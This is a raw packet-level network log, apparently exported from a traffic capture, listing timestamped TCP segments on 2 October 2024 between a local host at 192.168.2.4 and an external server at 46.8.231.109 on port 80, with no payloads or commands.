Oct 2, 2024 09:41:26.819741964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819741964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819741964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819741964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819746971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819781065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819813013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819844961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819875956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819922924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819963932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819963932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819963932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819963932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819963932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819963932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819983006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820013046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820044994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820075989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820106983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820153952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820184946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820193052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820193052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820193052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820193052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820193052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820193052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820214987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820249081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820255995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820266008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820280075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820312023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820343018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820374966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820405960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820414066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820414066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820414066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820414066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820414066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820441008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820472002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820503950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820533991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820564985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820595026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820626020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820632935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820632935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820632935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820632935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820632935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820632935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820657015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820688009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820719004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820750952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820782900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820813894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820844889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820877075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820907116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820938110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.820950985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820950985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820950985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820950985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820950985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820965052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820965052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.820971012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821002960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821033001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821063995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821111917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821144104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821145058 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821146011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821146011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821146011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821176052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821208000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821234941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821268082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821300030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821306944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821306944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821306944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821306944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821306944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821306944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821330070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821362019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821393013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821424007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821455002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821486950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821494102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821494102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821494102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821494102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821494102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821494102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821517944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821548939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821579933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821610928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821610928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821611881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821621895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821621895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821643114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821675062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821706057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.821743011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821743011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821743011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.821743011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.906758070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.906814098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.906833887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.906864882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.906896114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.906928062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.906960011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907006979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907038927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907069921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907078981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907078981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907078981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907078981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907078981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907100916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907133102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907164097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907212019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907243013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907274008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907320976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907351971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907361984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907361984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907361984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907361984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907361984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907402039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907418966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907437086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907485008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907516956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907531023 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907550097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907563925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907596111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907625914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907656908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907752991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907778025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907778025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907778025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907778025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907778025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.907788038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907820940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907870054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907902002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907934904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907965899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.907998085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908030987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908039093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908039093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908039093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908039093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908039093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908078909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908109903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908140898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908171892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908214092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908214092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908214092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908219099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908267975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908298969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908329964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908360004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908390999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908438921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908472061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908478975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908478975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908478975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908478975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908478975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908503056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908534050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908582926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908615112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908646107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908694029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908725023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908759117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908771992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908771992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908771992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908771992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908771992 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.908792019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908823013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908854961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908885956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908916950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908948898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.908979893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909010887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909043074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909044981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909075022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909123898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909156084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909204006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909235001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909266949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909281969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909281969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909281969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909281969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909298897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909329891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909360886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909394026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909421921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909451962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909483910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909513950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909545898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909568071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909568071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909568071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909568071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909568071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909578085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909609079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909641027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909672976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909703970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909735918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909766912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909782887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909782887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909782887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909782887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909782887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.909801960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909833908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909864902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909895897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909928083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909961939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.909992933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910020113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910051107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910068989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910068989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910068989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910068989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910083055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910084009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910084009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910114050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910145998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910154104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910154104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910154104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910177946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910208941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910240889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910271883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910303116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910322905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910322905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910324097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910324097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910324097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910336018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910367012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910398006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910429955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910460949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910492897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910527945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910558939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910592079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910599947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910599947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910600901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910600901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910600901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910600901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910623074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910655022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.910739899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910739899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.910739899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995239973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995285034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995337009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995382071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995420933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995420933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995662928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995712996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995754004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995754957 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995785952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995817900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995850086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995898962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995933056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995965004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.995966911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995966911 CEST	49749	80	192.168.2.4	46.8.231.109
